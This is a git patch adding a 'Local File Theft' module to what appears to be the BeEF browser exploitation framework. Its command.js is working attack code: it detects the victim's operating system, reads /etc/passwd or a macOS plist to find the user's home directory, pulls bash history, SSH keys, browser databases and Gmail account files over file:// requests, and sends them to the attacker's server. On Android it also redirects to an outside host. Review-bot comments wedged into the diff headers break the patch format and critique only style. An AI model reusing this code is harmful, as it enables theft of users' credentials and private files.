From ee1f4df1ea35010505d9964a23f7ccefc69e31a1 Mon Sep 17 00:00:00 2001
From: Mike Haworth
Date: Fri, 20 Jan 2012 23:14:38 +1300
Subject: [PATCH] added local file theft module

---
 modules/misc/local_file_theft/command.js | 212 ++++++++++++++++++++++
 modules/misc/local_file_theft/config.yaml | 14 ++
 modules/misc/local_file_theft/module.rb | 13 ++
 3 files changed, 239 insertions(+)
 create mode 100644 modules/misc/local_file_theft/command.js
 create mode 100644 modules/misc/local_file_theft/config.yaml
 create mode 100644 modules/misc/local_file_theft/module.rb

diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js
new file mode 100644
index 000000000..191179d7a
--- /dev/null
+++ b/modules/misc/local_file_theft/command.js
@@ -0,0 +1,212 @@
+// local_file_theft
+//
+// Shamelessly plagurised from kos.io/xsspwn
+
+beef.execute(function() {
+
+result = '';
+
+ fileList = ['linux','mac','ios','android','windows']
+
+
+ fileList['linux']= {
+ // How do we discover users?
+ "discover" :'/etc/passwd',
+
+ // Okay, we found them, what do we pillage?
+ "post" :{
+ 'bashHistory':'.bash_history',
+ 'sshHosts':'.ssh/known_hosts',
+ 'sshKeys':'.ssh/id_rsa.pub',
+ 'firefoxProfiles':'.mozilla/firefox/profiles.ini',
+ 'chromeBookmarks':'.config/chromium/Default/Bookmarks'
+ }
+ }
+
+ fileList['mac']= {
+ // How do we discover users?
+ "discover" :'/Library/Preferences/com.apple.loginwindow.plist',
+
+ // Okay, we found them, what do we pillage?
+ "post" :{
+ 'bashHistory':'.bash_history',
+ 'sshHosts':'.ssh/known_hosts',
+ 'sshKeys':'.ssh/id_rsa.pub',
+ 'firefoxProfiles':'.mozilla/firefox/profiles.ini',
+ 'chromeBookmarks':'.config/chromium/Default/Bookmarks'
+ }
+ }
+
+ fileList['android']= {
+ // Instead of how, just figure out the currently in use appi
+ "discover" :'/proc/self/status',
+
+ // Okay, we found them, what do we pillage?
+ "post" :{
+ 'browser_data':'/data/data/com.android.browser/databases/webview.db',
+ 'browser_data2':'/data/data/com.android.browser/databases/browser.db',
+ 'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml',
+ 'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db',
+ 'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db',
+ 'chromeBookmarks':'.config/chromium/Default/Bookmarks'
+ }
+ }
+
+ fileList['ios']= {
+ // WHAT IS THIS I DON'T EVEN
+ "discover" :'',
+
+ "post" :{
+ 'iPadEtcHosts':'/etc/hosts'
+ }
+ }
+
+ fileList['windows']= {
+ // Meh, who cares
+ "discover" :'',
+
+ "post" :{
+ 'bootini':'/c:/boot.ini',
+ 'hosts':'/c:/WINDOWS/system32/drivers/etc/hosts'
+ }
+ }
+
+ functionList = {
+ mac:{
+ // OS X disovery
+ discover : function(){
+ tmp = new XMLHttpRequest()
+ tmp.open('get',"file:///"+fileList['mac']['discover'])
+ tmp.send()
+ tmp.onreadystatechange=function(){
+ if(tmp.readyState==4){
+ // TODO
+ // Understand plist format to _reliably_ pull out username with regex
+ //user = tmp.responseText.match(/\x03\x57(.*)\x12/)[1];
+ user = tmp.responseText.match(/\x54(.*)\x12\x01/)[1];
+ homedir = "/Users/"+user+"/";
+ grabFiles(homedir,"mac")
+ }
+ }
+ return true;
+ }
+ },
+
+ linux:{
+ // Linux username discovery
+ discover : function(){
+ tmp = new XMLHttpRequest()
+ tmp.open('get',"file:///"+fileList['linux']['discover'])
+ tmp.send()
+ tmp.onreadystatechange=function(){
+ if(tmp.readyState==4){
+ userDir = tmp.responseText.match(/[a-z0-9]*:x:[0-9]{4}:[0-9]{4}:[^:]*:([^:]*)/)[1];
+ homedir = userDir+"/";
+
+ grabFiles(homedir,"linux")
+ }
+ }
+ return true;
+ }
+ },
+
+
+ ios:{
+ // Grab ipad stuff
+ discover : function(){
+ tmp = new XMLHttpRequest()
+ tmp.open('get',fileList['ios']['discover'])
+ tmp.send()
+ tmp.onreadystatechange=function(){
+ if(tmp.readyState==4){
+ homedir = "file:///";
+ grabFiles(homedir,"ios")
+ }
+ }
+
+ alert("ipad")
+ }
+ },
+
+ android:{
+ // figure out what app (gmail, browser, or dolphin?) android
+ discover : function(){
+ //document.location="http://kos.io/"
+ tmp = new XMLHttpRequest()
+ tmp.open('get',fileList['android']['discover'])
+ tmp.send()
+ tmp.onreadystatechange=function(){
+ if(tmp.readyState==4){
+ if(/.*android\.gm.*/.test(tmp.responseText)){
+ document.location="http://kos.io/gmail"
+ } else if(/.*android\.browser.*/.test(tmp.responseText)){
+ document.location="http://kos.io/browser"
+ } else if(/.*ek\.TunnyBrowser.*/.test(tmp.responseText)){
+ document.location="http://kos.io/dolphin"
+ }
+
+ grabFiles("/","android")
+ }
+ }
+ return true;
+ }
+ }
+
+
+ }
+
+
+ function identify(){
+ if(/.*Android.*/.test(navigator.userAgent)){
+ return "android"
+ } else if(/Linux.*/i.test(navigator.platform)){
+ return "linux"
+ } else if(/iP.*/i.test(navigator.platform)){
+ return "ios"
+ } else if(/.*Mac.*/i.test(navigator.userAgent)){
+ return "mac"
+ } else if(/.*Windows.*/i.test(navigator.userAgent)){
+ return "windows"
+ } else if(/.*hpwOS.*/i.test(navigator.platform)){
+ return "webos"
+ }
+ }
+
+
+ function discoverUsers(os){
+ return functionList[os]['discover']()
+ }
+
+
+ function grabFiles(dir,os){
+ tmpfile = {}
+ for (i in fileList[os]['post']){
+ console.log('dir = ' + dir);
+ console.log('fileList: ' + fileList[os]['post'][i]);
+ console.log(i);
+ tmpfile[i] = new XMLHttpRequest()
+ tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
+ tmpfile[i].send();
+
+ tmpfile[i].onreadystatechange=function(){
+ for (j in fileList[os]['post']){
+ if(tmpfile[j].readyState==4){
+ console.log('new returned for: ' + j);
+ result = j +": "+ tmpfile[j].responseText;
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
+ }
+ }
+ }
+
+
+ }
+
+ }
+
+
+ discoverUsers(identify());
+
+
+
+});
diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml
new file mode 100644
index 000000000..733714720
--- /dev/null
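Review bot: `fileList` near the top of this hunk is created as an array literal of OS names but is only ever used as a string-keyed object (`fileList['linux'] = …`), so the array contents are dead and `fileList = {}` would state the intent; the same applies to every other name here (`result`, `functionList`, `tmp`, `tmpfile`, `i`, `j`, `user`, `homedir`, `userDir`), which are assigned without `var` and so leak onto the hooked page's global scope, where `tmpfile` and `j` are shared and overwritten across `grabFiles` calls. The three `document.location="http://kos.io/…"` assignments in the android `discover` function, and the commented-out one above them, look carried over from the upstream source the header credits: they send the hooked browser to a third-party domain the project does not control and should be removed or justified in a comment. The file header should also state the precondition that config.yaml's description gives but this file does not, e.g. `// Only useful when the hook page itself was loaded via file:// (see config.yaml description)`.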
+++ b/modules/misc/local_file_theft/config.yaml
@@ -0,0 +1,14 @@
+# local_file_theft
+#
+# Shamelessly plagurised from kos.io/xsspwn
+
+beef:
+ module:
+ local_file_theft:
+ enable: true
+ category: "Misc"
+ name: "Local File Theft"
+ description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme, this module checks common locations and cheekily snaches anything it finds. Shameless plagurised from kos.io/xsspwn. To test this module save the beefhook page locally and open in safari from the your localfile system"
+ authors: ["mh"]
+ target:
+ working: ["All"]
diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb
new file mode 100644
index 000000000..63f372c04
--- /dev/null
+++ b/modules/misc/local_file_theft/module.rb
@@ -0,0 +1,13 @@
+# local_file_theft
+#
+# Shamelessly plagurised from kos.io/xsspwn
+
+class Local_file_theft < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+ end
+
+end
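Review bot: The `description` value in the config.yaml hunk has typos that will be shown verbatim in the UI — "plagurised" should be "plagiarised", "snaches" should be "snatches", and "the your localfile system" should be "your local file system" — and the same "plagurised" appears in the header comment of this file and of command.js and module.rb. `working: ["All"]` is also broader than the description's own precondition (the hook page loaded from a local file via `file://`), so either narrow the target or say explicitly in the description that the module only applies under that condition.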